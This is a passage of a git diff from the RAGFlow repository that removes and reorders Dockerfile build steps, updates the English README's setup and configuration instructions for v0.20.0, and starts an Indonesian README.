+++ b/Dockerfile.scratch
@ -1,54 +0,0 @@
 FROM ubuntu:22.04
 USER root
 WORKDIR /ragflow
 RUN apt-get update && apt-get install -y wget curl build-essential libopenmpi-dev
 RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
    bash ~/miniconda.sh -b -p /root/miniconda3 && \
    rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
    echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
    echo "conda activate base" >> ~/.bashrc
 ENV PATH /root/miniconda3/bin:$PATH
 RUN conda create -y --name py11 python=3.11
 ENV CONDA_DEFAULT_ENV py11
 ENV CONDA_PREFIX /root/miniconda3/envs/py11
 ENV PATH $CONDA_PREFIX/bin:$PATH
 RUN curl -sL https://deb.nodesource.com/setup_14.x | bash -
 RUN apt-get install -y nodejs
 RUN apt-get install -y nginx
 ADD ./web ./web
 ADD ./api ./api
 ADD ./conf ./conf
 ADD ./deepdoc ./deepdoc
 ADD ./rag ./rag
 ADD ./requirements.txt ./requirements.txt
 RUN apt install openmpi-bin openmpi-common libopenmpi-dev
 ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
 RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
 RUN cd ./web && npm i && npm run build
 RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt
 RUN apt-get update && \
    apt-get install -y libglib2.0-0 libgl1-mesa-glx && \
    rm -rf /var/lib/apt/lists/*
 RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ ollama
 RUN conda run -n py11 python -m nltk.downloader punkt
 RUN conda run -n py11 python -m nltk.downloader wordnet
 ENV PYTHONPATH=/ragflow/
 ENV HF_ENDPOINT=https://hf-mirror.com
 ADD docker/entrypoint.sh ./entrypoint.sh
 RUN chmod +x ./entrypoint.sh
 ENTRYPOINT ["./entrypoint.sh"]
--- a/Dockerfile.scratch.oc9
+++ b/Dockerfile.scratch.oc9
@ -1,56 +1,61 @@
-FROM opencloudos/opencloudos:9.0
+FROM opencloudos/opencloudos:9.0
-USER root
+USER root
-
+
-WORKDIR /ragflow
+WORKDIR /ragflow
-
+
-RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
+RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
-
+
-RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
+RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
-    bash ~/miniconda.sh -b -p /root/miniconda3 && \
+    bash ~/miniconda.sh -b -p /root/miniconda3 && \
-    rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
+    rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
-    echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
+    echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
-    echo "conda activate base" >> ~/.bashrc
+    echo "conda activate base" >> ~/.bashrc
-
+
-ENV PATH /root/miniconda3/bin:$PATH
+ENV PATH /root/miniconda3/bin:$PATH
-
+
-RUN conda create -y --name py11 python=3.11
+RUN conda create -y --name py11 python=3.11
-
+
-ENV CONDA_DEFAULT_ENV py11
+ENV CONDA_DEFAULT_ENV py11
-ENV CONDA_PREFIX /root/miniconda3/envs/py11
+ENV CONDA_PREFIX /root/miniconda3/envs/py11
-ENV PATH $CONDA_PREFIX/bin:$PATH
+ENV PATH $CONDA_PREFIX/bin:$PATH
-
+
-# RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
+# RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
-RUN dnf install -y nodejs
+RUN dnf install -y nodejs
-
+
-RUN dnf install -y nginx
+RUN dnf install -y nginx
-
+
-ADD ./web ./web
+ADD ./web ./web
-ADD ./api ./api
+ADD ./api ./api
-ADD ./conf ./conf
+ADD ./docs ./docs
-ADD ./deepdoc ./deepdoc
+ADD ./conf ./conf
-ADD ./rag ./rag
+ADD ./deepdoc ./deepdoc
-ADD ./requirements.txt ./requirements.txt
+ADD ./rag ./rag
-
+ADD ./requirements.txt ./requirements.txt
-RUN dnf install -y openmpi openmpi-devel python3-openmpi
+ADD ./agent ./agent
-ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
+ADD ./graphrag ./graphrag
-ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
+ADD ./plugin ./plugin
-RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
+
-RUN cd ./web && npm i && npm run build
+RUN dnf install -y openmpi openmpi-devel python3-openmpi
-RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
+ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
-RUN conda run -n py11 pip install redis
+ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
-
+RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
-RUN dnf update -y && \
+RUN cd ./web && npm i && npm run build
-    dnf install -y glib2 mesa-libGL && \
+RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
-    dnf clean all
+RUN conda run -n py11 pip install redis
-
+
-RUN conda run -n py11 pip install ollama
+RUN dnf update -y && \
-RUN conda run -n py11 python -m nltk.downloader punkt
+    dnf install -y glib2 mesa-libGL && \
-RUN conda run -n py11 python -m nltk.downloader wordnet
+    dnf clean all
-
+
-ENV PYTHONPATH=/ragflow/
+RUN conda run -n py11 pip install ollama
-ENV HF_ENDPOINT=https://hf-mirror.com
+RUN conda run -n py11 python -m nltk.downloader punkt
-
+RUN conda run -n py11 python -m nltk.downloader wordnet
-ADD docker/entrypoint.sh ./entrypoint.sh
+
-RUN chmod +x ./entrypoint.sh
+ENV PYTHONPATH=/ragflow/
-
+ENV HF_ENDPOINT=https://hf-mirror.com
-ENTRYPOINT ["./entrypoint.sh"]
+
 COPY docker/service_conf.yaml.template ./conf/service_conf.yaml.template
 ADD docker/entrypoint.sh ./entrypoint.sh
 RUN chmod +x ./entrypoint.sh
 ENTRYPOINT ["./entrypoint.sh"]
--- a/README.md
+++ b/README.md
@ -1,203 +1,406 @@
-<div align="center">
+<div align="center">
-<a href="https://demo.ragflow.io/">
+<a href="https://demo.ragflow.io/">
-<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
+<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
-</a>
+</a>
-</div>
+</div>
-
+
-<p align="center">
+<p align="center">
-  <a href="./README.md">English</a> |
+  <a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DBEDFA"></a>
-  <a href="./README_zh.md">简体中文</a> |
+  <a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
-  <a href="./README_ja.md">日本語</a>
+  <a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
-</p>
+  <a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
-
+  <a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
-<p align="center">
+  <a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
-    <a href="https://github.com/infiniflow/ragflow/releases/latest">
+  <a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
-        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
+</p>
-    </a>
+
-    <a href="https://demo.ragflow.io" target="_blank">
+<p align="center">
-        <img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
+    <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
-    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
+        <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
-        <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.3.2-brightgreen"
+    </a>
-            alt="docker pull infiniflow/ragflow:v0.3.2"></a>
+    <a href="https://demo.ragflow.io" target="_blank">
-      <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
+        <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
-    <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
+    </a>
-  </a>
+    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
-</p>
+        <img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
-
+    </a>
-## 💡 What is RAGFlow?
+    <a href="https://github.com/infiniflow/ragflow/releases/latest">
-
+        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
-[RAGFlow](https://demo.ragflow.io) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
+    </a>
-
+    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
-## 🌟 Key Features
+        <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
-
+    </a>
-### 🍭 **"Quality in, quality out"**
+    <a href="https://deepwiki.com/infiniflow/ragflow">
-
+        <img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
+    </a>
- Finds "needle in a data haystack" of literally unlimited tokens.
+</p>
-
+
-### 🍱 **Template-based chunking**
+<h4 align="center">
-
+  <a href="https://ragflow.io/docs/dev/">Document</a> |
- Intelligent and explainable.
+  <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
- Plenty of template options to choose from.
+  <a href="https://twitter.com/infiniflowai">Twitter</a> |
-
+  <a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
-### 🌱 **Grounded citations with reduced hallucinations**
+  <a href="https://demo.ragflow.io">Demo</a>
-
+</h4>
- Visualization of text chunking to allow human intervention.
+
- Quick view of the key references and traceable citations to support grounded answers.
+#
-
+
-### 🍔 **Compatibility with heterogeneous data sources**
+<div align="center">
-
+<a href="https://trendshift.io/repositories/9064" target="_blank"><img src="https://trendshift.io/api/badge/repositories/9064" alt="infiniflow%2Fragflow | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/></a>
- Supports Word, slides, excel, txt, images, scanned copies, structured data, web pages, and more.
+</div>
-
+
-### 🛀 **Automated and effortless RAG workflow**
+<details open>
-
+<summary><b>📕 Table of Contents</b></summary>
- Streamlined RAG orchestration catered to both personal and large businesses.
+
- Configurable LLMs as well as embedding models.
+- 💡 [What is RAGFlow?](#-what-is-ragflow)
- Multiple recall paired with fused re-ranking.
+- 🎮 [Demo](#-demo)
- Intuitive APIs for seamless integration with business.
+- 📌 [Latest Updates](#-latest-updates)
-
+- 🌟 [Key Features](#-key-features)
-## 📌 Latest Features
+- 🔎 [System Architecture](#-system-architecture)
-
+- 🎬 [Get Started](#-get-started)
- 2024-04-19 Support conversation API ([detail](./docs/conversation_api.md)).
+- 🔧 [Configurations](#-configurations)
- 2024-04-16 Add an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding).
+- 🔧 [Build a docker image without embedding models](#-build-a-docker-image-without-embedding-models)
- 2024-04-16 Add [FastEmbed](https://github.com/qdrant/fastembed), which is designed specifically for light and speedy embedding.
+- 🔧 [Build a docker image including embedding models](#-build-a-docker-image-including-embedding-models)
- 2024-04-11 Support [Xinference](./docs/xinference.md) for local LLM deployment.
+- 🔨 [Launch service from source for development](#-launch-service-from-source-for-development)
- 2024-04-10 Add a new layout recognization model for analyzing Laws documentation.
+- 📚 [Documentation](#-documentation)
- 2024-04-08 Support [Ollama](./docs/ollama.md) for local LLM deployment.
+- 📜 [Roadmap](#-roadmap)
- 2024-04-07 Support Chinese UI.
+- 🏄 [Community](#-community)
-
+- 🙌 [Contributing](#-contributing)
-## 🔎 System Architecture
+
-
+</details>
-<div align="center" style="margin-top:20px;margin-bottom:20px;">
+
-<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
+## 💡 What is RAGFlow?
-</div>
+
-
+[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document
-## 🎬 Get Started
+understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models)
-
+to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted
-### 📝 Prerequisites
+data.
-
+
- CPU >= 4 cores
+## 🎮 Demo
- RAM >= 16 GB
+
- Disk >= 50 GB
+Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
+
-  > If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
+<div align="center" style="margin-top:20px;margin-bottom:20px;">
-
+<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
-### 🚀 Start up the server
+<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
-
+</div>
-1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/max_map_count.md)):
+
-
+## 🔥 Latest Updates
-   > To check the value of `vm.max_map_count`:
+
-   >
+- 2025-08-01 Supports agentic workflow.
-   > ```bash
+- 2025-05-23 Adds a Python/JavaScript code executor component to Agent.
-   > $ sysctl vm.max_map_count
+- 2025-05-05 Supports cross-language query.
-   > ```
+- 2025-03-19 Supports using a multi-modal model to make sense of images within PDF or DOCX files.
-   >
+- 2025-02-28 Combined with Internet search (Tavily), supports reasoning like Deep Research for any LLMs.
-   > Reset `vm.max_map_count` to a value at least 262144 if it is not.
+- 2024-12-18 Upgrades Document Layout Analysis model in DeepDoc.
-   >
+- 2024-08-22 Support text to SQL statements through RAG.
-   > ```bash
+
-   > # In this case, we set it to 262144:
+## 🎉 Stay Tuned
-   > $ sudo sysctl -w vm.max_map_count=262144
+
-   > ```
+⭐️ Star our repository to stay up-to-date with exciting new features and improvements! Get instant notifications for new
-   >
+releases! 🌟
-   > This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
+
-   >
+<div align="center" style="margin-top:20px;margin-bottom:20px;">
-   > ```bash
+<img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
-   > vm.max_map_count=262144
+</div>
-   > ```
+
-
+## 🌟 Key Features
-2. Clone the repo:
+
-
+### 🍭 **"Quality in, quality out"**
-   ```bash
+
-   $ git clone https://github.com/infiniflow/ragflow.git
+- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated
-   ```
+  formats.
-
+- Finds "needle in a data haystack" of literally unlimited tokens.
-3. Build the pre-built Docker images and start up the server:
+
-
+### 🍱 **Template-based chunking**
-   ```bash
+
-   $ cd ragflow/docker
+- Intelligent and explainable.
-   $ chmod +x ./entrypoint.sh
+- Plenty of template options to choose from.
-   $ docker compose up -d
+
-   ```
+### 🌱 **Grounded citations with reduced hallucinations**
-
+
-   > The core image is about 9 GB in size and may take a while to load.
+- Visualization of text chunking to allow human intervention.
-
+- Quick view of the key references and traceable citations to support grounded answers.
-4. Check the server status after having the server up and running:
+
-
+### 🍔 **Compatibility with heterogeneous data sources**
-   ```bash
+
-   $ docker logs -f ragflow-server
+- Supports Word, slides, excel, txt, images, scanned copies, structured data, web pages, and more.
-   ```
+
-
+### 🛀 **Automated and effortless RAG workflow**
-   _The following output confirms a successful launch of the system:_
+
-
+- Streamlined RAG orchestration catered to both personal and large businesses.
-   ```bash
+- Configurable LLMs as well as embedding models.
-       ____                 ______ __
+- Multiple recall paired with fused re-ranking.
-      / __ \ ____ _ ____ _ / ____// /____  _      __
+- Intuitive APIs for seamless integration with business.
-     / /_/ // __ `// __ `// /_   / // __ \| | /| / /
+
-    / _, _// /_/ // /_/ // __/  / // /_/ /| |/ |/ /
+## 🔎 System Architecture
-   /_/ |_| \__,_/ \__, //_/    /_/ \____/ |__/|__/
+
-                 /____/
+<div align="center" style="margin-top:20px;margin-bottom:20px;">
-
+<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
-    * Running on all addresses (0.0.0.0)
+</div>
-    * Running on http://127.0.0.1:9380
+
-    * Running on http://x.x.x.x:9380
+## 🎬 Get Started
-    INFO:werkzeug:Press CTRL+C to quit
+
-   ```
+### 📝 Prerequisites
-   > If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.  
+
-
+- CPU >= 4 cores
-5. In your web browser, enter the IP address of your server and log in to RAGFlow.
+- RAM >= 16 GB
-   > With default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
+- Disk >= 50 GB
-6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
+- Docker >= 24.0.0 & Docker Compose >= v2.26.1
-
+- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use the code executor (sandbox) feature of RAGFlow.
-   > See [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) for more information.
+
-
+> [!TIP]
-   _The show is now on!_
+> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
-
+
-## 🔧 Configurations
+### 🚀 Start up the server
-
+
-When it comes to system configurations, you will need to manage the following files:
+1. Ensure `vm.max_map_count` >= 262144:
-
+
- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
+   > To check the value of `vm.max_map_count`:
- [service_conf.yaml](./docker/service_conf.yaml): Configures the back-end services.
+   >
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
+   > ```bash
-
+   > $ sysctl vm.max_map_count
-You must ensure that changes to the [.env](./docker/.env) file are in line with what are in the [service_conf.yaml](./docker/service_conf.yaml) file.
+   > ```
-
+   >
-> The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, and you are REQUIRED to ensure that all environment settings listed in the [./docker/README](./docker/README.md) file are aligned with the corresponding configurations in the [service_conf.yaml](./docker/service_conf.yaml) file.
+   > Reset `vm.max_map_count` to a value at least 262144 if it is not.
-
+   >
-To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.
+   > ```bash
-
+   > # In this case, we set it to 262144:
-> Updates to all system configurations require a system reboot to take effect:
+   > $ sudo sysctl -w vm.max_map_count=262144
->
+   > ```
-> ```bash
+   >
-> $ docker-compose up -d
+   > This change will be reset after a system reboot. To ensure your change remains permanent, add or update the
-> ```
+   > `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
-
+   >
-## 🛠️ Build from source
+   > ```bash
-
+   > vm.max_map_count=262144
-To build the Docker images from source:
+   > ```
-
+
-```bash
+2. Clone the repo:
-$ git clone https://github.com/infiniflow/ragflow.git
+
-$ cd ragflow/
+   ```bash
-$ docker build -t infiniflow/ragflow:v0.3.2 .
+   $ git clone https://github.com/infiniflow/ragflow.git
-$ cd ragflow/docker
+   ```
-$ chmod +x ./entrypoint.sh
+
-$ docker compose up -d
+3. Start up the server using the pre-built Docker images:
-```
+
-
+> [!CAUTION]
-## 📚 Documentation
+> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
-
+> If you are on an ARM64 platform, follow [this guide](https://ragflow.io/docs/dev/build_docker_image) to build a Docker image compatible with your system.
- [FAQ](./docs/faq.md)
+
-
+   > The command below downloads the `v0.20.0-slim` edition of the RAGFlow Docker image. See the following table for descriptions of different RAGFlow editions. To download a RAGFlow edition different from `v0.20.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` for the full edition `v0.20.0`.
-## 📜 Roadmap
+
-
+   ```bash
-See the [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162)
+   $ cd ragflow/docker
-
+   # Use CPU for embedding and DeepDoc tasks:
-## 🏄 Community
+   $ docker compose -f docker-compose.yml up -d
-
+
- [Discord](https://discord.gg/4XxujFgUN7)
+   # To use GPU to accelerate embedding and DeepDoc tasks:
- [Twitter](https://twitter.com/infiniflowai)
+   # docker compose -f docker-compose-gpu.yml up -d
-
+   ```
-## 🙌 Contributing
+
-
+   | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable?                  |
-RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part, review our [Contribution Guidelines](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) first.
+   |-------------------|-----------------|-----------------------|--------------------------|
   | v0.20.0           | &approx;9       | :heavy_check_mark:    | Stable release           |
   | v0.20.0-slim      | &approx;2       | ❌                   | Stable release            |
   | nightly           | &approx;9       | :heavy_check_mark:    | _Unstable_ nightly build |
   | nightly-slim      | &approx;2       | ❌                   | _Unstable_ nightly build  |
 4. Check the server status after having the server up and running:
   ```bash
   $ docker logs -f ragflow-server
   ```
   _The following output confirms a successful launch of the system:_
   ```bash
         ____   ___    ______ ______ __
        / __ \ /   |  / ____// ____// /____  _      __
       / /_/ // /| | / / __ / /_   / // __ \| | /| / /
      / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
     /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/
    * Running on all addresses (0.0.0.0)
   ```
   > If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anormal`
   > error because, at that moment, your RAGFlow may not be fully initialized.
 5. In your web browser, enter the IP address of your server and log in to RAGFlow.
   > With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default
   > HTTP serving port `80` can be omitted when using the default configurations.
 6. In [service_conf.yaml.template](./docker/service_conf.yaml.template), select the desired LLM factory in `user_default_llm` and update
   the `API_KEY` field with the corresponding API key.
   > See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
   _The show is on!_
 ## 🔧 Configurations
 When it comes to system configurations, you will need to manage the following files:
 - [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and
  `MINIO_PASSWORD`.
 - [service_conf.yaml.template](./docker/service_conf.yaml.template): Configures the back-end services. The environment variables in this file will be automatically populated when the Docker container starts. Any environment variables set within the Docker container will be available for use, allowing you to customize service behavior based on the deployment environment.
 - [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
 > The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service
 > configurations which can be used as `${ENV_VARS}` in the [service_conf.yaml.template](./docker/service_conf.yaml.template) file.
 To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80`
 to `<YOUR_SERVING_PORT>:80`.
 Updates to the above configurations require a reboot of all containers to take effect:
 > ```bash
 > $ docker compose -f docker-compose.yml up -d
 > ```
 ### Switch doc engine from Elasticsearch to Infinity
 RAGFlow uses Elasticsearch by default for storing full text and vectors. To switch to [Infinity](https://github.com/infiniflow/infinity/), follow these steps:
 1. Stop all running containers:
   ```bash
   $ docker compose -f docker/docker-compose.yml down -v
   ```
 > [!WARNING]
 > `-v` will delete the docker container volumes, and the existing data will be cleared.
 2. Set `DOC_ENGINE` in **docker/.env** to `infinity`.
 3. Start the containers:
   ```bash
   $ docker compose -f docker-compose.yml up -d
   ```
 > [!WARNING]
 > Switching to Infinity on a Linux/arm64 machine is not yet officially supported.
 ## 🔧 Build a Docker image without embedding models
 This image is approximately 2 GB in size and relies on external LLM and embedding services.
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
 ```
 ## 🔧 Build a Docker image including embedding models
 This image is approximately 9 GB in size. As it includes embedding models, it relies on external LLM services only.
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
 ```
 ## 🔨 Launch service from source for development
 1. Install uv, or skip this step if it is already installed:
   ```bash
   pipx install uv pre-commit
   ```
 2. Clone the source code and install Python dependencies:
   ```bash
   git clone https://github.com/infiniflow/ragflow.git
   cd ragflow/
   uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
   uv run download_deps.py
   pre-commit install
   ```
 3. Launch the dependent services (MinIO, Elasticsearch, Redis, and MySQL) using Docker Compose:
   ```bash
   docker compose -f docker/docker-compose-base.yml up -d
   ```
   Add the following line to `/etc/hosts` to resolve all hosts specified in **docker/.env** to `127.0.0.1`:
   ```
   127.0.0.1       es01 infinity mysql minio redis sandbox-executor-manager
   ```
 4. If you cannot access HuggingFace, set the `HF_ENDPOINT` environment variable to use a mirror site:
   ```bash
   export HF_ENDPOINT=https://hf-mirror.com
   ```
 5. If your operating system does not have jemalloc, please install it as follows:
   ```bash
   # ubuntu
   sudo apt-get install libjemalloc-dev
   # centos
   sudo yum install jemalloc
   ```
 6. Launch backend service:
   ```bash
   source .venv/bin/activate
   export PYTHONPATH=$(pwd)
   bash docker/launch_backend_service.sh
   ```
 7. Install frontend dependencies:
   ```bash
   cd web
   npm install
   ```
 8. Launch frontend service:
   ```bash
   npm run dev
   ```
   _The following output confirms a successful launch of the system:_
   ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
 9. Stop RAGFlow front-end and back-end service after development is complete:
   ```bash
   pkill -f "ragflow_server.py|task_executor.py"
   ```
 ## 📚 Documentation
 - [Quickstart](https://ragflow.io/docs/dev/)
 - [Configuration](https://ragflow.io/docs/dev/configurations)
 - [Release notes](https://ragflow.io/docs/dev/release_notes)
 - [User guides](https://ragflow.io/docs/dev/category/guides)
 - [Developer guides](https://ragflow.io/docs/dev/category/developers)
 - [References](https://ragflow.io/docs/dev/category/references)
 - [FAQs](https://ragflow.io/docs/dev/faq)
 ## 📜 Roadmap
 See the [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214)
 ## 🏄 Community
 - [Discord](https://discord.gg/NjYzJD3GM3)
 - [Twitter](https://twitter.com/infiniflowai)
 - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
 ## 🙌 Contributing
 RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community.
 If you would like to be a part, review our [Contribution Guidelines](https://ragflow.io/docs/dev/contributing) first.
--- a/README_id.md
+++ b/README_id.md
@ -0,0 +1,371 @@
 <div align="center">
 <a href="https://demo.ragflow.io/">
 <img src="web/src/assets/logo-with-text.png" width="520" alt="Logo ragflow">
 </a>
 </div>
 <p align="center">
  <a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
  <a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
  <a href="./README_tzh.md"><img alt="繁體中文版自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
  <a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
  <a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
  <a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DBEDFA"></a>
  <a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
 </p>
 <p align="center">
    <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
        <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="Ikuti di X (Twitter)">
    </a>
    <a href="https://demo.ragflow.io" target="_blank">
        <img alt="Lencana Daring" src="https://img.shields.io/badge/Online-Demo-4e6b99">
    </a>
    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
        <img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
    </a>
    <a href="https://github.com/infiniflow/ragflow/releases/latest">
